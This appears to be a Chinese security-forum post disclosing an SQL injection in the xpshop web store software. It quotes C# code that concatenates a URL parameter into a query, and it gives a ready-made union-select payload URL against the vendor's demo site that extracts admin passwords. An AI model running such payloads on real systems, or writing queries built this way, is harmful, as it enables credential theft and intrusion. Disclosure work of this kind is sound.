搜索
查看: 2210|回复: 0

xpshop网店系统sql注入一处(官方demo演示)

[复制链接]

75

主题

107

帖子

199

积分

注册会员

Rank: 2

积分
199
发表于 2019-5-15 15:40:26 | 显示全部楼层 |阅读模式

详细说明:
漏洞位置xpshop.webui.Show:
private void GetImg(string pids)
{
ProductDB productDB = new ProductDB();
DataTable thumbnailImg = productDB.GetThumbnailImg(pids);
thumbnailImg.TableName = "Products";
base.Response.Write(XpShopJson.DtToJSON(thumbnailImg));
}

这里是问题函数,我就不写怎么跟进来的,就是page_load,等下直接用payload测试就好了,官网demo的。

跟进去GetThumbnailImg函数:
public DataTable GetThumbnailImg(string pid)
{
string commandText = "SELECT ProductID,ProductName,ThumbnailImg,CategoryID,CategoryNo FROM Product WHERE ProductID = " + pid;
return XpShopDB.ExecuteDataTable(XpShopDB.ConnectionString, CommandType.Text, commandText, null);
}

payload:

[url]http://clothes.xpshop.cn/show.aspx?type=1&action=GetImg&pids=1[/url] union select password,2,3,4,5 from admin--

漏洞证明:

[url]http://clothes.xpshop.cn/show.aspx?type=1&action=GetImg&pids=1[/url] union select password,2,3,4,5 from admin--


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
专业装逼!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

温馨提示
1:发帖请遵守《中华人民共和国网络安全法》,发帖内容不得维护国家的、集体的、个人的利益。
2:请勿发布恶意攻击他人的技术文章、工具、和使用教程,发现后删帖处理。
3:本站的目的在于让更多的人了解网络安全,避免受到他人的恶意攻击。
4:本站中的部分文章,可能会出现一些“技术类手段”,但这仅仅为学习演示所用,而非恶意传播技术。
5:本站中的部分文章,可能转载自互联网。如有侵权行为,联系我们删除即可。
6:学习仅是充实头脑,切勿恶意攻击个人、企业等。所造成的法律后果一切由自己承担,本站及其站长概不负责。
我知道了
快速回复 返回顶部 返回列表